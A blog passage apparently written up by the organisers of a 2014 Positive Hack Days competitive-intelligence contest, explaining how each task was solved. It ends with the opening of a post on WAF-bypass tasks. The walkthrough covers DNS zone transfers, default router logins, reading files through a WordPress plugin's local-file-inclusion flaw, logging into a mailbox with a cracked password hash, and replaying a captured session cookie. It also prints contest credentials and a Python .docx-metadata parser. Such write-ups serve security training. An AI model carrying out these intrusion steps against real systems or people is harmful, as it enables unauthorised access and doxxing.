src="http://3.bp.blogspot.com/-Va-F1ZbbGhg/U8YhqOEK6yI/AAAAAAAAEMk/_qAS26h56cU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F31.png" height="226" width="400" /></a></div><br />After googling the nickname we found out that the admin has two accounts on GitHub, one for work and another one just for fun. 
The second account's repository was where the .htpasswd file could be found, along with the IP address of the host it was taken from.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-HGwwNugt588/U8YhxBU1WBI/AAAAAAAAEMs/LpKVrmB-vjk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-HGwwNugt588/U8YhxBU1WBI/AAAAAAAAEMs/LpKVrmB-vjk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F32.png" height="87" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uzZVYe3An0M/U8Yh2iDJtrI/AAAAAAAAEM0/Evcx792p5A0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-uzZVYe3An0M/U8Yh2iDJtrI/AAAAAAAAEM0/Evcx792p5A0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F33.png" height="147" width="400" /></a></div><br />The IP address matches wwidol.com, which means the admin keeps other files on the WWIdol server. But under which host name? 
A participant who had already tried a zone transfer (AXFR) at this point would know about the host src.wwidol.com; if not, it was high time either to brute-force third-level domain names or to request a zone transfer.<br /><br />The password was easy to guess ("admin"), and it was enough to get all the data about the admin from the file /about-me.txt.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qoVo8ZQZNCE/U8Yh9DorVrI/AAAAAAAAEM8/l7aR00rMygI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qoVo8ZQZNCE/U8Yh9DorVrI/AAAAAAAAEM8/l7aR00rMygI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F34.png" height="260" width="400" /></a></div><b>Solved by:</b> 3 participants<br /><br /><b>Points:</b> 30<br /><br /><b>3.4. The admin and the cop are connected</b><br /><br /><b>Nickname:</b> Cop<br /><br /><b>About:</b> Admin and Cop are somehow connected. Errr, but how? Gosh..<br /><br />Let's check the file src.wwidol.com/note.txt. It holds a login, a password and the IP address of a web camera, and a delivery invoice seen through that camera tells us everything about the cop.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-yl6-qVTkqKE/U8YiJxkoORI/AAAAAAAAENE/z8daag-9FcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-yl6-qVTkqKE/U8YiJxkoORI/AAAAAAAAENE/z8daag-9FcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F35.png" height="340" width="400" /></a></div><br /><b>Solved by:</b> 3 participants<br /><br /><b>Points:</b> 20<br /><br /><b>3.5. 
When an anonymizer doesn't help</b><br /><br /><b>Nickname:</b> ParanoidHacker<br /><br /><b>Hint: </b>The hacker uses an anonymizer, but his DNS requests don't go through it. We know for sure that during the day the hacker is at his so-called "official" job, but he keeps doing nasty things from there. He also runs his own website, which doesn't look hack-proof, so you are welcome to prove it.<br /><br />The hacker's e-mail is at the bottom of <a href="http://wwidol.com/">wwidol.com</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-G9BM8YkDqyk/U8Yia7n4pgI/AAAAAAAAENM/KnLbtIPCVYM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-G9BM8YkDqyk/U8Yia7n4pgI/AAAAAAAAENM/KnLbtIPCVYM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F36.png" height="267" width="400" /></a></div><br />If we send him a link (as we did in task 2.5), he follows it through an anonymizer (as the hint published on the third day says). However, the DNS query for our domain is made from the hacker's own network, so it arrives at our name server from his address rather than the anonymizer's.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-UFolH8i4Rjk/U8YinAWuhXI/AAAAAAAAENU/VfOnnIxhETI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-UFolH8i4Rjk/U8YinAWuhXI/AAAAAAAAENU/VfOnnIxhETI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F37.png" height="23" width="400" /></a></div><br />That network sat behind an office router still using the default account 
admin:admin.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-pewwX5V32f4/U8YitNlu_MI/AAAAAAAAENc/FfCRxVXGFp4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-pewwX5V32f4/U8YitNlu_MI/AAAAAAAAENc/FfCRxVXGFp4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F38.png" height="97" width="400" /></a></div><br />The router's logs showed that the hacker visited homehekkers.com, a homemade site built on a WordPress template, with the Dewplayer plugin installed, which is vulnerable to local file inclusion (LFI):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-x7pUZJt3gGk/U8YjChWQ48I/AAAAAAAAENs/1FZyD500hdE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-x7pUZJt3gGk/U8YjChWQ48I/AAAAAAAAENs/1FZyD500hdE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F39.png" height="123" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br />What's more, <a href="http://homehekkers.com/">homehekkers.com</a> and <a href="http://wwidol.com/">wwidol.com</a> are hosted on the same IP address (what a coincidence!), which means the LFI lets us read /tmp/dump.sql and learn everything about the hacker (Hello Moscow!).<br /><br /><b>Solved by:</b> 0 participants<br /><b><br /></b><b>Points:</b> 50<br /><br /><b>3.6. Somebody's leaking information to ATH</b><br /><br /><b>Nickname:</b> rat<br /><br /><b>About:</b> Here is the list of the potential rat's accounts at the forum: http://anneximous.com/rat.txt. Find me the rat!<br /><br /><b>Hint:</b> Once upon a time there was and is Google mail. 
Stories were written and songs were composed 'bout Google mail remembering even the things one wouldn't suspect. And they all lived happily ever after. The question is who are "they"…?<br /><br />The last task in this set was to find the ATH rat planted in Anneximous. The participants get a list of suspects in the form email:md5(password). Only one of the hashes can be googled easily:<br /><br /><span style="font-family: Courier New, Courier, monospace;">kevinreissen@wwidol.com:09d1d20bd495912ed5307a08510440d6 (Admin111)</span><br /><br />wwidol.com's mail is hosted on Google Apps, which its MX records reveal with a simple nslookup.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OU3seHbYQhI/U8YjVKJpGhI/AAAAAAAAEN0/x9FtMgaV3Bc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-OU3seHbYQhI/U8YjVKJpGhI/AAAAAAAAEN0/x9FtMgaV3Bc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F40.png" height="113" width="400" /></a></div><br />After logging into this Gmail account, a contestant could find, in the account activity details, a record of IMAP access from the device com.android.email, and thus the rat's IP address.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6cfHNJbYJag/U8Yjc_mDmjI/AAAAAAAAEN8/MQaYC0jnkM8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-6cfHNJbYJag/U8Yjc_mDmjI/AAAAAAAAEN8/MQaYC0jnkM8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F41.png" height="228" width="400" /></a></div><br />From there the contestant could reach the computer on the internal network and get all the necessary information using the vulnerability in ATH's 
router.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-f3PxSCCsYwk/U8Yjh-IlIMI/AAAAAAAAEOE/0NcJUja3OmA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-f3PxSCCsYwk/U8Yjh-IlIMI/AAAAAAAAEOE/0NcJUja3OmA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F42.png" height="45" width="400" /></a></div><br /><b>Solved by:</b> 0 participants<br /><br /><b>Points:</b> 20<br /><br /><b><span style="font-size: large;">4. Finishing spurt</span></b><br /><br />We are coming to the end of our story about competitive intelligence. The participants had to dig up information about the ATH rat planted in WWidol and about the bosses of Anneximous and WWidol.<br /><br /><b>4.1. wwidolRat</b><br /><b><br /></b><b>Nickname:</b> wwidolRat<br /><br /><b>About:</b> Info: rat's report at <a href="http://athc.biz/docs/f4dd947b925ef548fcdfd66789174033.docx">http://athc.biz/docs/f4dd947b925ef548fcdfd66789174033.docx</a>.<br /><br />The participants were offered the rat's report. 
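A .docx is a ZIP package whose document properties live in docProps/core.xml (author, last modifier, dates) and docProps/app.xml (application, company, template), fields the authoring machine fills in without the writer noticing. The Python code below is an added example, not the organizers' code: it reads both parts with the standard library alone and also scans every XML part for strings that look like IPv4 addresses, which is how a planted address such as the one in this report surfaces. The sample document it builds in memory, and every value in it, are constructed for the demo.<br /><br />

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used inside docProps/*.xml (fixed by the OOXML spec)
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
CORE_FIELDS = ["dc:creator", "cp:lastModifiedBy", "dc:title", "dc:description",
               "cp:keywords", "dcterms:created", "dcterms:modified", "cp:revision"]
APP_FIELDS = ["ep:Application", "ep:AppVersion", "ep:Company", "ep:Template", "ep:Manager"]
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")


def _fields(xml_bytes, wanted):
    """Pick the listed prefix:local elements out of one properties part, skipping empty ones."""
    root = ET.fromstring(xml_bytes)
    out = {}
    for qname in wanted:
        prefix, local = qname.split(":")
        node = root.find("{%s}%s" % (NS[prefix], local))
        if node is not None and node.text and node.text.strip():
            out[qname] = node.text.strip()
    return out


def docx_metadata(data):
    """Return {'core': {...}, 'app': {...}, 'ip_addresses': [...]} for a .docx given as bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        core = _fields(z.read("docProps/core.xml"), CORE_FIELDS) if "docProps/core.xml" in names else {}
        app = _fields(z.read("docProps/app.xml"), APP_FIELDS) if "docProps/app.xml" in names else {}
        ips = []
        for name in sorted(names):                      # comments, rels and body text can leak too
            if name.endswith((".xml", ".rels")):
                for ip in IPV4_RE.findall(z.read(name).decode("utf-8", errors="replace")):
                    if ip not in ips:
                        ips.append(ip)
    return {"core": core, "app": app, "ip_addresses": ips}


def build_sample_docx():
    """Constructed archive with only the parts the parser reads; values are invented for the demo."""
    core = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" xmlns:dcterms="%(dcterms)s" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
            '<dc:creator>rat</dc:creator><cp:lastModifiedBy>j.smith</cp:lastModifiedBy>'
            '<dc:description>printed from \\\\192.0.2.25\\reports</dc:description>'
            '<dcterms:created xsi:type="dcterms:W3CDTF">2014-05-15T09:30:00Z</dcterms:created>'
            '</cp:coreProperties>') % NS
    app = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<Properties xmlns="%(ep)s"><Application>Microsoft Office Word</Application>'
           '<Company>ATH</Company><Template>Normal.dotm</Template></Properties>') % NS
    document = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                '<w:body><w:p><w:r><w:t>Report</w:t></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document)
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical usage: python3 docxmeta.py report.docx; without an argument the constructed sample is used.
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for section, values in docx_metadata(data).items():
        print(section, values)
```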
Its metadata gives away an IP address and, once again, lets us pull useful information from the computer in ATH's network.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LdbtcgRdnFI/U8Yj5wDKWjI/AAAAAAAAEOM/TKZHffCAgcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LdbtcgRdnFI/U8Yj5wDKWjI/AAAAAAAAEOM/TKZHffCAgcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F43.png" height="257" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YGZUz3iEfFM/U8YkIK1wxwI/AAAAAAAAEOU/cBBzxwW-Xv0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YGZUz3iEfFM/U8YkIK1wxwI/AAAAAAAAEOU/cBBzxwW-Xv0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F44.png" height="65" width="400" /></a></div><br />Moreover, there's an archive with some data on the rat's computer, but unfortunately it's password-protected.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2REx6kQVVkI/U8YkOafYzPI/AAAAAAAAEOc/nSn9d_ayIHI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-2REx6kQVVkI/U8YkOafYzPI/AAAAAAAAEOc/nSn9d_ayIHI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F45.png" height="85" width="400" /></a></div>It turned out that the rat has a website of his own, but ATH blocks it for some reason.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="http://4.bp.blogspot.com/-t-v7LIQGR2M/U8YkWr_x8eI/AAAAAAAAEOk/ry7C9EJmGgs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-t-v7LIQGR2M/U8YkWr_x8eI/AAAAAAAAEOk/ry7C9EJmGgs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F46.png" height="82" width="400" /></a></div><br />If we request that IP address by the site's domain names (kevin-donnalley.com and images.kevin-donnalley.com), we get it:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jdOqbd3JzRw/U8YkeXzCtEI/AAAAAAAAEOs/cbrPuuU8dQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-jdOqbd3JzRw/U8YkeXzCtEI/AAAAAAAAEOs/cbrPuuU8dQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F47.png" height="235" width="400" /></a></div><br />Now we check Thumbs.db there and find the rat's Facebook ID in base64 (base64_encode(facebook_id)):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-9mN2V1zQ-Z0/U8YkmkUsP7I/AAAAAAAAEO0/eEkRSvAg-0w/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-9mN2V1zQ-Z0/U8YkmkUsP7I/AAAAAAAAEO0/eEkRSvAg-0w/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F48.png" height="195" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a 
href="http://4.bp.blogspot.com/-__b9RfBIJVY/U8YkzeG0H5I/AAAAAAAAEO8/kjOySjuARmo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-__b9RfBIJVY/U8YkzeG0H5I/AAAAAAAAEO8/kjOySjuARmo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F49.png" height="252" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><b>Solved by:</b> 2 participants<br /><br /><b>Points:</b> 20<br /><br /><b>4.2. Seizing power in the band</b><br /><b><br /></b><b>Nickname:</b> Anneximous Boss<br /><br /><b>About:</b> empty<br /><br /><b>Hint:</b> You can use the SIP accounts 4000–4040 with the password “phdIV” at 107.170.92.105, but you still need to find the boss's nickname ;)<br /><br />The rat's report contains a direct link to the folder with the reports' images:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hvS4uE5j1uQ/U8YlDIZKmRI/AAAAAAAAEPE/YO9MC4yMkQM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-hvS4uE5j1uQ/U8YlDIZKmRI/AAAAAAAAEPE/YO9MC4yMkQM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F50.png" height="308" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wr7YxwJZg1A/U8YlKFDhyvI/AAAAAAAAEPM/YepcJTZTbPk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wr7YxwJZg1A/U8YlKFDhyvI/AAAAAAAAEPM/YepcJTZTbPk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F51.png" height="215" width="400" /></a></div><br />In this folder we can spot some new 
report identifiers and then try to access those reports.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5QCAPQvO24Y/U8YlUVuOVuI/AAAAAAAAEPU/VYJDULMGcE0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-5QCAPQvO24Y/U8YlUVuOVuI/AAAAAAAAEPU/VYJDULMGcE0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F52.png" height="332" width="400" /></a></div><br />Here we found a report on the bosses of Anneximous and WWIdol, with a password and a traffic dump. We open the captured request:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /profile.php?PHPSESSID=055e9c961e311901050b261e16ef57aa HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: anneximous.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Cookie: PHPSESSID=055e9c961e311901050b261e16ef57aa;</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept: */*</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept-Language: en</span><br /><span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br /><span style="font-family: Courier New, Courier, monospace;">Connection: close</span><br /><br />Replaying that request with its session ID gives us the name and SIP account of the Anneximous boss.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OyCivM71SZo/U8Ylg3YvgQI/AAAAAAAAEPc/lGLS3QXPLwk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
src="http://3.bp.blogspot.com/-OyCivM71SZo/U8Ylg3YvgQI/AAAAAAAAEPc/lGLS3QXPLwk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F53.png" height="131" width="400" /></a></div><br /><br /><b>Solved by: </b>0 participants<br /><br /><b>Points:</b> 55<br /><br /><b>4.3. Surprise</b><br /><br /><b>Nickname:</b> Wwidol Boss<br /><br /><b>About:</b> empty<br /><br />The boss's SIP would seem unnecessary, because we already have all the data needed to fill in the form. If any of the participants had reached this task, called the boss (johanson@107.170.92.105) and examined the traffic, he or she would have noticed that packets started to flow through 128.199.236.23, the host boss.wwidol.com. It turned out that the bosses of Anneximous and WWIdol are the same person. What a twist in the plot!<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ltX7v8EhesE/U8YlvA-DvlI/AAAAAAAAEPk/BE5r2JzQuMk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ltX7v8EhesE/U8YlvA-DvlI/AAAAAAAAEPk/BE5r2JzQuMk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F54.png" height="173" width="400" /></a></div><br /> Now we can try to send the same query with the same password (bosses, being only human, like to reuse passwords) to wwidol.com, and find his "nickname" on WWidol.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Fy7_vU5dTIc/U8YmKTB6ilI/AAAAAAAAEPs/QCDHBFZo2Qs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Fy7_vU5dTIc/U8YmKTB6ilI/AAAAAAAAEPs/QCDHBFZo2Qs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F55.png" height="166" width="400" /></a></div><br 
/><br />P. S. No one reached this task, but one of the winners managed to guess the boss's nickname using the very first report and to call him.<br /><br /><b>Solved by:</b> 0 participants<br /><br /><b>Points:</b> 30<br /><br />The contest was finished at 7:00 pm on May 17 (it lasted three days instead of the planned two days), though some participants offered their answers after the contest was over. 301 participants registered to compete in the contest, 82 solved the intro task. Other details are available in the table below.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kYDmF5IbWuk/U8YmWaCKVTI/AAAAAAAAEP0/qR8elIQ8nPo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+11.14.16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kYDmF5IbWuk/U8YmWaCKVTI/AAAAAAAAEP0/qR8elIQ8nPo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+11.14.16.png" height="306" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><i>* Without 20 points for 2.4 task</i></div><div><br /></div><div><br /></div></div>Unknownnoreply@blogger.com455tag:blogger.com,1999:blog-5176771794789502609.post-29567494111138021532014-07-14T13:59:00.000+04:002014-07-14T13:59:05.266+04:00Review of WAF Bypass Tasks<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/db2/b02/4cb/db2b024cb93726a1b6b3b44da0f4dc1b.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/db2/b02/4cb/db2b024cb93726a1b6b3b44da0f4dc1b.jpg" height="200" width="200" /></a></div>This year, the visitors of the Positive Hack Days Forum were invited to have a shot at 
bypassing the <a href="http://www.ptsecurity.com/what_we_do/application-firewall/" target="_blank">PT Application Firewall</a> in the contest called WAF Bypass. It was a good opportunity for us to test our product in action, because the forum gathered the best information security experts. We had prepared a set of tasks for the contest, each representing a script with a typical vulnerability.<br /><br />The participants were invited to use these vulnerabilities to get flags. All tasks were solvable, though some solutions were not obvious. The contestants were also given a report produced by scanning the tasks' source code with another Positive Technologies product, Application Inspector. In this article, we consider the contest tasks, the bypass methods, and the lessons we learned.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/65c/710/9f5/65c7109f5f3dd8e73f7c14335b2084c2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/65c/710/9f5/65c7109f5f3dd8e73f7c14335b2084c2.png" height="112" width="640" /></a></div><a name='more'></a><br /><b><span style="font-size: large;">1. XXE</span></b><br /><br />The first task included a PHP-based XMLRPC server vulnerable to XML External Entity 